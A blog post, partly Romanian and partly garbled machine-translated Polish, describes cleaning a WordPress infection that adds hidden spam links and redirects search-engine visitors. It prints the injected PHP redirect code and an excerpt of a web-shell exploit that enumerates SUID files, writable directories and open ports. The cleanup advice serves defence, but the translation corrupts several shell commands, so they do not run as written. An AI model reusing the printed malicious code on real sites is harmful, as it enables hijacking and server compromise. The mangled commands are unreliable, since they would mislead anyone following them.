In ultima luna, am tot primit avertismente de virus in blog de la unii vizitatori. Initial am ignorat avertismentele, pentru ca aveam instalat un antivirus destul de bun (Kaspersky AV 2009) si desi stateam mult timp pe blog, nu am primit niciodata alerta de virus (.. mai demult am vazut ceva suspect, care la primul refresh a disparut. in fine…).
Incet, incet au inceput sa apara variatii mari ale traficului de vizitatori, dupa care in ultima vreme traficul a scazut constant si au inceput sa fie tot mai multi cei care sa-mi spuna ca stealthsettings.com to jest Wirusat. Ieri am primit de la cineva un screenshot facut in momentul in care antivirusul a blocat un scenariusz de pe stealthsettings.com :Trojan-Clicker.HTML.IFrame.gr. Przekonało mnie to na tyle, że zacząłem szukać tego we wszystkich źródłach. Pierwszy pomysł, który przyszedł mi do głowy, to to zrobić aktualizacja do najnowszej wersji WordPress (2.5.1), ale nie przed usunięciem wszystkich starych plików skryptów WordPress i wykonaniem kopia zapasowa bazy danych. Ta procedura nie dała żadnych rezultatów i prawdopodobnie zajęłoby mi dużo czasu, zanim dowiedziałbym się, gdzie jest błąd, gdyby mi nie powiedział Eugeniusz podczas dyskusji przy kawie, którą odkrył link w Google i byłoby miło to zobaczyć.
MyDigitalLife.info opublikował artykuł pod tytułem: „WordPress Hack: odzyskaj i napraw Google i wyszukiwarkę lub brak ruchu cookie przekierowanego do Your-Needs.info, AnyResults.Net, Golden-Info.net i innych nielegalnych stron”, i to jest koniec wątku, którego potrzebowałem.
Chodzi o wykorzystać przez WordPress w oparciu o pliki cookies, który moim zdaniem jest bardzo skomplikowany i wykonany zgodnie z książką. Wystarczająco mądry, żeby taki stworzyć Wstrzyknięcie SQL w bazie blogaW aby utworzyć niewidzialnego użytkownika do prostej rutynowej kontroli od Panel->UżytkownicyW aby sprawdzić „zapisywalne” katalogi i pliki na serwerze (które mają chmod 777), aby szukać i do wykonać pliki z uprawnieniami grupy lub nawet roota. Nie znam nazwy tego exploita i widzę, że napisano o nim niewiele artykułów, mimo że zainfekowanych blogów jest wiele, w tym z Rumunii. OK... Spróbuję wyjaśnić ogólnie na temat tego wirusa.
Co robi wirus?
Przede wszystkim wstawia w źródłach stron na blogach linki niewidoczne dla odwiedzających, ale widoczne i indeksowalne dla wyszukiwarek, zwłaszcza Google. W ten sposób przenieść Page Rank do witryn wskazanych przez atakującego. Po drugie, dodaje się jeszcze jeden kod przekierowania URL, dla gości, którzy pochodzą z Google, Live, Yahoo, ... lub z czytnika RSS i nie mają witryny w ciastko. I antywirus wykrywa to przekierowanie jako Trojan-Clicker.HTML.
Objawy:
Ogromny spadek ruchu odwiedzających, zwłaszcza na blogach, na których większość odwiedzających pochodzi z Google.
Zidentyfikować: (w tym miejscu problem staje się skomplikowany dla tych, którzy nie wiedzą zbyt wiele o phpmyadmin, php i Linuksie)
. OSTROŻNY!!! NAJPIERW ZRÓB KOPIĘ ZAPASOWĄ BAZY DANYCH!!!
1. Sprawdź źródła plików index.phpW Header.phpW stope.php, z tematu bloga i sprawdź, czy istnieje kod wykorzystujący szyfrowanie baza64 lub zawiera „if($ser=="1? && sizeof($_COOKIE)==0)” w postaci:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>...lub coś podobnego. Usuń ten kod!
Kliknij, wyobraź sobie…
Na powyższym zrzucie ekranu omyłkowo wybrałem „<?php get_header(); ?>Ten kod musi pozostać.
2. Użyj phpMyAdmin i przejdź do tabeli w bazie danych wp_użytkownicy, gdzie sprawdzasz, czy istnieje użytkownik bez nazwy, utworzony dnia 00:00:00 0000-00-00 (jest to możliwe w terenie login_użytkownika napisz „WordPress”. Zapisz identyfikator tego użytkownika (pole ID), a następnie go usuń.
Kliknij, wyobraź sobie…
*ten na zielonej linii, jego identyfikator należy usunąć i zachować. W jego przypadku senny, był ID=8 .
3. Podejdź do stołu wp_usermeta, unde trebuie sa localizati jesteś USUWAĆ liniile aferente ID-ului (unde in campul user_id apare valoarea ID-ului sters) .
4. In tabelul wp_option, wejdź active_plugins si vedeti ce plugin este activat suspect. Acesta poate folosi terminatii de genul _old.giff, _old.pngg, _old.jpeg, _new.php.giff, etc combinatii de extensii imagine bogus cu _old si _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Stergeti acest plugin, dupa care mergeti in blog –> Dashboard –> Plugins, unde dezactivati si activati un plugin oarecare.
Click pe imagine, sa vedeti cum apare fisierul virusat in active_plugins.
Urmati calea pe FTP sau SSH, indicata in active_plugins si stergeti fisierul de pe server.
5. Tot in phpMyAdmin, in tabelul wp_option, gasiti si stergeti randul care contine “rss_f541b3abd05e7962fcab37737f40fad8” si randul “internal_links_cache”.
W internal_links_cache linki spamowe pojawiające się na blogu i a Kod Google Adsense, hakera.
6. Zaleca się zmień hasło logowania się na blogu i tak dalej usuń wszystkich podejrzanych użytkowników. Zaktualizuj do najnowszej wersji WordPressa i ustaw blog tak, aby nie pozwalał już na rejestrację nowych użytkowników. Nie ma żadnej straty... nawet niezalogowany może komentować.
Powyżej starałem się wyjaśnić na ile, co w takiej sytuacji zrobić, aby oczyścić blog z tego wirusa. Problem jest znacznie poważniejszy, niż się wydaje i nie jest daleki od rozwiązania, ponieważ są one używane Słabości bezpieczeństwa serwera hostingowego, na którym znajduje się blog.
Jako pierwszy środek bezpieczeństwa, którzy mają dostęp Ssh, aby sprawdzić na serwerze, czy nadal istnieją pliki takie jak *_old* i *_new.* z końcówkami .gif, .jpeg, .pngg, .jpgg. Pliki te należy usunąć. Jeśli zmienimy nazwę pliku, np. top_right_old.giff W top_right_old.php, widzimy, że plik zawiera dokładnie kod exploita serwera.
Kilka przydatnych wskazówek dotyczących sprawdzania, czyszczenia i zabezpieczania serwera. (przez SSH)
1. płyta CD /tmp i sprawdź, czy są takie foldery tmpVFlma lub inne podobne kombinacje nazw i usuń je. Na zrzucie ekranu poniżej możesz zobaczyć dwa takie foldery dla mnie:
rm –rf numer folderu
2. Sprawdź i usuń (zmień chmod) jak najwięcej folderów z atrybutami chmod 777
znajdź wszystkie zapisywalne pliki w bieżącym katalogu: znajdować . -typ f -perm -2 -ls
znajdź wszystkie zapisywalne katalogi w bieżącym katalogu: znajdować . -typ d -perm -2 -ls
znajdź wszystkie zapisywalne katalogi i pliki w bieżącym katalogu: znajdować . -perm -2 –ls
3. Poszukaj podejrzanych plików na serwerze.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, OSTROŻNY!!! do plików, które ustawiają bit POŁUDNIE I Łyżwa. Pliki te są wykonywane z uprawnieniami użytkownika (grupy) lub roota, a nie użytkownika wykonującego plik. Pliki te mogą prowadzić do naruszenia uprawnień administratora, jeśli występują problemy z bezpieczeństwem. Jeśli nie używasz plików z bitami SUID i SGID, uruchom „zmień 0” na nich lub odinstaluj pakiet zawierający je.
Exploit zawiera gdzieś w źródle...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}…practic in acest mod gaseste bresele in securitate. Porturi deschise, directoare “writable” si executare fisiere cu privilegii de grup / root.
Revin cu detalii…
Cateva bloguri infectate: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
… si lista poate continua … foarte mult.
Puteti verifica daca un blog este virusat, folosind motorul de cautare Google. copy & paste :
site:www.blegoo.com buy
Dobrej nocy i dobrej pracy ;) Myślę, że wkrótce Eugen przyjedzie z nowościami na prevezibil.imprevizibil.com.
brr :)
W: UWAGA! Zmiana motywu WordPress lub aktualizacja do wersji WordPress 2.5.1 NIE jest rozwiązaniem pozwalającym pozbyć się tego wirusa.
